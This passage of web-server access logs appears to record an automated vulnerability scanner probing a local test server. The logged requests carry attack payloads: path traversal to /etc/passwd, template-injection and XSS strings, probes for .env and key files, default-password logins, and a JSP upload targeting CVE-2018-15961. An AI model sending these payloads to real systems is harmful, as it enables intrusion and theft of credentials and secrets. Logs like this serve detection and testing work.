+0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?phpinfo=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm935/index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm/ess.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bzr/branch/branch.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftb.imagegallery.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/xweb500.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229N5EhVS1u959dFlPauMqL17bVU.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int 